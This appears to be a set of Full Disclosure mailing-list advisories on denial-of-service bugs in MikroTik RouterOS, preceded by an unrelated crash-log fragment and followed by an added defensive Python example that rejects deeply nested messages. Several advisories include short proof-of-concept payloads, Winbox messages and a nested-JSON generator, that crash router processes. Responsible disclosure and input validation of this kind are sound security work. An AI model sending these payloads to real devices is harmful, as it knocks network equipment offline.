2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp  00:0c 959
   /lib/libdl-0.9.33.2.so
2020.06.04-18:25:16.04@0: 774bb000-774d r-xp  00:1f 15
/ram/pckg/dhcp/lib/libudhcp.so
2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp  00:0c 956
   /lib/libssl.so.1.0.0
2020.06.04-18:25:16.04@0: 77528000-7753 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp  00:0c 954
   /lib/libcrypto.so.1.0.0
2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448
2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47
77 06 00 00 00 00 92 48 77 20 00 00 00 

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-05-12 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: until stable 6.45.7 (first vulnerability), until stable
6.46.4 (second vulnerability)
Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
vulnerability)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
stable release tree when found. Maybe other release trees also suffer from
these vulnerabilities.

1. The cerm process suffers from an uncontrolled resource consumption
issue. By sending a crafted packet, an authenticated remote user can cause
a high cpu load, which may make the device respond slowly or unable to
respond.

2. The traceroute process suffers from a memory corruption issue. By
sending a crafted packet, an authenticated remote user can crash the
traceroute process due to invalid memory access.


Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/stable-release-tree



Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2020-04-14 Thread Q C
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
from these two vulnerabilities.

Details
===

Product: MikroTik's RouterOS
Affected Versions: through 6.46.5 (stable release tree)
Fixed Versions: -
Vendor URL: https://mikrotik.com/
Vendor Status: not fixed yet
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Poc
===
The following pocs are based on the tool routeros (
https://github.com/tenable/routeros)

1) memory corruption in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe000c, -1);
msg.add_u32(9, 9);

2) assertion failure in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe0001, 0);

Disclosure timeline
===
2019/08/23  reported the 2nd issue to the vendor
2019/08/26  reported the 1st issue to the vendor
2019/08/28  vendor reproduced the 1st issue and will fix it as soon as
possible
2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as
possible
2019/12/02  notified the vendor the 1st issue still exists in version
6.44.6 (2nd issue fixed)
2020/01/06  no response from the vendor, and did the initial disclosure
2020/04/14  re-tested these two issues against the stable 6.46.5, and
updated the disclosure



Q C wrote on Mon, 6 Jan 2020 at 7:32 PM:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: before 6.44.6 (Long-term release tree)
> Fixed Versions: 6.44.6 (Long-term release tree)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> long-term release tree when found. Maybe other release trees also suffer
> from these issues.
>
> 1. The console process suffers from a memory corruption issue.
> An authenticated remote user can crash the console process due to a NULL
> pointer reference by sending a crafted packet.
>
> 2. The console process suffers from an assertion failure issue. There is a
> reachable assertion in the console process. An authenticated remote user
> can crash the console process due to assertion failure by sending a crafted
> packet.
>
> Solution
> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>


[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-01-07 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.6 (Long-term release tree)
Fixed Versions: 6.44.6 (Long-term release tree)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
long-term release tree when found. Maybe other release trees also suffer
from these issues.

1. The console process suffers from a memory corruption issue.
An authenticated remote user can crash the console process due to a NULL
pointer reference by sending a crafted packet.

2. The console process suffers from an assertion failure issue. There is a
reachable assertion in the console process. An authenticated remote user
can crash the console process due to assertion failure by sending a crafted
packet.

Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree



[FD] Two vulnerabilities found in MikroTik's RouterOS

2019-07-23 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.5 (Long-term release tree),
   before 6.45.1 (Stable release tree)
Fixed Versions: 6.44.5 (Long-term release tree),
6.45.1 (Stable release tree)
Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree
Vendor Status: fixed version released
CVE: CVE-2019-13954, CVE-2019-13955
Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Details of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
6.42.11 and 6.43.16 (Long-term release tree) when found.


1. CVE-2019-13954: memory exhaustion via a crafted POST request
This vulnerability is similar to the CVE-2018-1157. An authenticated user
can cause the www binary to consume all memory via a crafted POST request
to /jsproxy/upload. It's because of the incomplete fix for the
CVE-2018-1157.

Based on the poc for cve_2018_1157 provided by the @Jacob Baines (really
appreciate!), crafting a filename ending with many '\x00' can bypass the
original fix to trigger the vulnerability.


2. CVE-2019-13955: stack exhaustion via recursive parsing of JSON
This vulnerability is similar to the CVE-2018-1158. An authenticated user
communicating with the www binary can trigger a stack exhaustion
vulnerability via recursive parsing of JSON containing message type M.

Based on the poc for cve_2018_1158 provided by the @Jacob Baines (really
appreciate!), crafting a JSON message with type M can trigger the
vulnerability. A simple python script to generate the crafted message is as
follows.

# Wrap the innermost '[]' 2000 times to build a deeply nested message
msg = "{M01:[M01:[]]}"
for _ in range(2000):
    msg = msg.replace('[]', "[M01:[]]")


Solution


Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1
(Stable release tree).


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[2] https://github.com/tenable/routeros
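Two input checks that would close off the failure modes described in this advisory, added here as an example (this is not MikroTik's fix and not code from the tenable/routeros tool): an iterative nesting-depth gate that rejects a message shaped like the generated one above before any recursive parser sees it, and a filename check that rejects the trailing NUL bytes used to get past the earlier CVE-2018-1157 fix. The depth limit of 32 and the 255-byte filename limit are assumed policy values, not vendor figures; build_nested reproduces the advisory's own generator so the test input has the same shape as the PoC.

```python
# Bracket characters of the JSproxy message format shown in the advisory.
OPENERS = {"{": "}", "[": "]"}
CLOSERS = set(OPENERS.values())


def build_nested(rounds):
    """Reproduce the advisory's generator: wrap the innermost '[]' `rounds` times."""
    msg = "{M01:[M01:[]]}"
    for _ in range(rounds):
        msg = msg.replace("[]", "[M01:[]]")
    return msg


def nesting_depth(msg, limit=None):
    """Maximum bracket depth of msg, scanned left to right with an explicit stack.

    Raises ValueError as soon as the depth exceeds `limit` (when given) or the
    brackets turn out unbalanced, so a hostile message is refused before a
    recursive-descent parser ever touches it. The scan itself never recurses,
    so the check cannot be exhausted the way the parser can.
    """
    stack = []
    deepest = 0
    for ch in msg:
        if ch in OPENERS:
            stack.append(OPENERS[ch])
            deepest = max(deepest, len(stack))
            if limit is not None and deepest > limit:
                raise ValueError(f"nesting deeper than {limit}")
        elif ch in CLOSERS:
            if not stack or stack.pop() != ch:
                raise ValueError("unbalanced brackets")
    if stack:
        raise ValueError("unbalanced brackets")
    return deepest


def accept_message(msg, max_depth=32):
    """Gate a parser front end would call before recursing into msg (assumed limit)."""
    try:
        nesting_depth(msg, limit=max_depth)
    except ValueError:
        return False
    return True


def filename_is_clean(name, max_len=255):
    """Reject upload filenames carrying NUL bytes or path separators (assumed policy)."""
    return (0 < len(name) <= max_len
            and "\x00" not in name
            and "/" not in name and "\\" not in name)


if __name__ == "__main__":
    benign = "{M01:[M01:[]]}"
    hostile = build_nested(2000)
    print("benign depth:", nesting_depth(benign), "accepted:", accept_message(benign))
    print("hostile depth:", nesting_depth(hostile), "accepted:", accept_message(hostile))
    print("filename with trailing NULs accepted:", filename_is_clean("a.txt" + "\x00" * 64))
```

The point of checking depth with a limit rather than computing it fully is that the gate fails fast: a 2000-level message is refused after 33 opening brackets, whatever its total length, and the parser behind it never sees the input.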
